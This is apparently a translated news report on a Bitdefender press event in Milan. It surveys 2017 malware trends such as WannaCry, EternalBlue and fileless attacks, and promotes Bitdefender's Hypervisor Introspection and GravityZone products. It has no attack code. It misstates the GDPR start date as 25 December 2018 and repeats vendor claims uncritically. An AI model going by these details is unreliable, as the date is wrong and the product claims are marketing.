Bitdefender describes the current bleak picture of computer threats and presents future trends, illustrating his completely innovative methods that will enable businesses to deal with increasingly complex malware and targeted attacks.
In recent days Bitdefender organised an interesting press conference in Milan, in which we participated. The spokesperson for the company, a worldwide specialist in IT security technologies and an innovative solutions provider (its solutions protect more than 500 million users in more than 150 countries), painted the current scene and presented future trends explaining which strategies can be put in place to protect against new threats, which are becoming increasingly more complex.
Security is a top priority for any business (or at least it’s supposed to be …). Targeted attacks, which are increasingly more widespread, can be exploited by cyber-criminals to carry out industrial espionage, to steal intellectual property or confidential information, or simply to cause serious damage (such as the loss of data).
Data, including personal information, has in fact become vital for the global economy. Properly protecting company data and that of customers is the key to gaining a competitive edge, protecting and expanding their business, and preserving the freedom to communicate.
On the 25th December 2018 the new General Data Protection Regulation (GDPR) will come into effect, drawn up by the European Commission last year and focusing on the obligations of those who process data of European Union residents.
The GDPR makes a significant push for investment in security solutions and data protection. The latter part of the year and early part of the next will be the best time for companies to reflect on their policies for the defence of information stored within their infrastructure.
Just think that if the phenomenon of cybercrime in Italy grew by 13.3% compared to last year, the level of espionage and sabotage has unfortunately seen, as always in our country, a leap of 127%.
In the report prepared by Clusit, the Italian Association for Computer Security, 2011 was named as the annus horribilis for safety; 2017, however, came out even worse as well as confirming that our markets are completely inadequate.
The framework for current and future cyber threats according to Bitdefender
During 2017 we’ve witnessed the spread of malware developed from code embezzled governmental agencies (presumably the American NSA). These are exploit codes often unknown to security solution vendors, able to evade conventional security tools.
Threats like WannaCry and GoldenEye have caused a lot of damage between the second and third quarter of this year by blocking the activity of entire companies and causing unprecedented operating losses.
Malware capable of lateral movement (i.e. able to spread within the local network using shared folders and user privileges) have become increasingly popular. Exploits known by the names of EternalBlue and EternalRomance have been repeatedly exploited by cyber criminals to “carve out” spaces inside vulnerable corporate networks and from there monitor the traffic inside another’s network (with the ability to monitor and take information).
Bitdefender has also recorded a growing interest by malware writers, in opensource and freeware tools, modified “artfully” and integrated into customized packages.
These software tools are more and more “popular” in APT (advanced persistent threat) attacks, an attack designed to find a privileged “gateway” within any company, starting for example with a malware campaign targeted at users or administrators whose systems connected to the company LAN. The use of security measures doesn’t rise to the occasion, shared resources are not adequately protected, and accounts that have too many rights can lead to a complete debacle, showing weakness to an attack that initially had success on a single workstation or endpoints.
Bitdefender uses over 500 million sensors and honeypot to detect emerging threats promptly and has immediate visibility on smaller cyber-attacks seeking to overcome security controls.
Looking at the statistics, one in six spam emails contains some form of ransomware and this type of malware designed to target companies are now a reality.
2017 was then the year of miner, an illegal cryptocurrency, which uses different techniques to infect users’ systems, and lateral movement to spread inside corporate networks.
According to Bitdefender’s engineers over the next year new exploit codes will emerge, taken from government agencies, which will probably be used for disruptive attacks. Lateral movement, moreover, will become standard in most malware. They’re getting better and better at obtaining passwords, such as Mimikatz which can leverage wormable vulnerability.
What will become increasingly popular are so-called fileless attacks which, unlike traditional attacks, are not based on the release, but on storing and executing a malicious file at the system level.
The term fileless, in fact, does not refer to the fact that during the attack it doesn’t use a file, but rather, to trigger the infection nothing needs to be saved locally on the victim’s system.
With Windows 10, which is becoming increasingly more popular, Bitdefender explains that it is reasonable to expect an increase of attacks based on Powershell scripts or on the new Linux Bash.
According to Bitdefender technicians, ransomware will begin to spread that uses the computing power of modern GPUs to act faster and try to overcome detection by anti-malware products.
The use of polymorphism as a tool will take even more of a foothold. Already today’s attackers are used to using polymorphic engines on the cloud to flood the network with unique variations of the same malware and make detection even harder.
On one hand it generates samples designed to produce “false positives”, on the other it increases the malware payload so that it can pass unnoticed by the majority of security solutions.
Unfortunately the spread of botnet composed of the Internet of Things (IoT) with vulnerable firmware or otherwise inadequately protected will become more and more common. Last but not least, Bitdefender foresees that 2018 will be the year in which the malware writers will devote even greater efforts to attacking macOS.
BitDefender Hypervisor Introspection, for protection against advanced attacks
During the presentation held in Milan a few days ago, Bitdefender presented its new solution to help businesses protect against advanced attacks: Hypervisor Introspection.
Liviu Arsene, senior e-threat specialist at Bitdefender, explained that now, in the world of computer security, some aspects should be understood by managers and business decision makers. In particular:
– Known and unknown vulnerabilities can be used by cyber-criminals to violate the company’s infrastructure.
– There are Exploits kept secret by government agencies (but often raked over by targeted attacks) which can be exploited for mass assaults such as an APT.
– Unaddressed vulnerability can potentially expose the data of millions of customers or users.
– Current endpoint security solutions are often inadequate for responding quickly to new threats.
BitDefender Hypervisor Introspection (HVI) is the first solution (developed in conjunction with Citrix) capable of exposing memory breaches that endpoint security tools fail to recognise, analysing lines directly in raw memory, and ensuring that they are not altered by malware.
The protection provided by HVI is particularly interesting and effective because it’s external to the operating system. You don’t need to install anything on each workstation or server machines operating at the hypervisor level.
BitDefender HVI carries out a forced isolation in hardware and cannot be disabled or compromised by Rootkits or other threats in the operating system kernel.
By way of example, Arsene has proven how Bitdefender’s solution is able to quickly block any threat capable of lateral movement such as EternalBlue.
And precisely because it’s not installed on an agent, HVI is compatible with any security solution in use at the enterprise level and is capable of producing an alert as soon as a violation of memory is detected, providing a detailed report about the sequence the attack, with an indication of the processes affected, the type of violation, and the history of aggression.
HVI changes the approach to the problem of security, focusing on techniques used in modern attacks and blocking heap spray attack, code injection, function detouring, API hooking, and so on.
In addition to having minimal impact in terms of performance, HVI allows you to wipe out the weaknesses relating to corporate network security and devices connected to it.
Bitdefender’s proposal for effectively protecting endpoints
Denis Cassinerio, regional sales director for Bitdefender Italy, then shone a light on the endpoint protection solution.
As we mentioned in the introduction, endpoints will obviously continue to be the preferred “gateway” of cyber-criminals to the company structure.
Suffice to say that 62% of malware are installed with the classic “double-click” on malicious attachments received in an e-mail and that 92% of phishing attacks are followed by the installation of some malicious software on the user’s client.
Fileless attacks, those which don’t even save any files at the file system level, always use the RAM and Windows registry, and take advantage of web browser flaws while you visit web pages that host vulnerability exploit kits and when using outdated versions of plug-ins for your browser.
Using this approach, the malicious code is simply downloaded and executed from there.
BitDefender offers an integrated solution – GravityZone Endpoint Security HD – which uses an adaptive approach on the single endpoint and, thanks to the HyperDetect module, activates pre-run protection for malware and runtime against fileless attacks.
Bitdefender HyperDetect relies on tried-and-tested machine learning models, on solid heuristics, and on detecting threats by monitoring their behaviour.
The new solution presented by Bitdefender is therefore an excellent response against targeted attacks (APT), suspicious files and network traffic (macros, scripts, …), exploit code, ransomware and greyware (software that falls in that grey area between malware and legitimate programs).
The innovative approach presented by Bitdefender will certainly help companies to gear up for time for the requirements, laid down by the new European regulations (GDPR) – effectively protecting your data and their digital identities.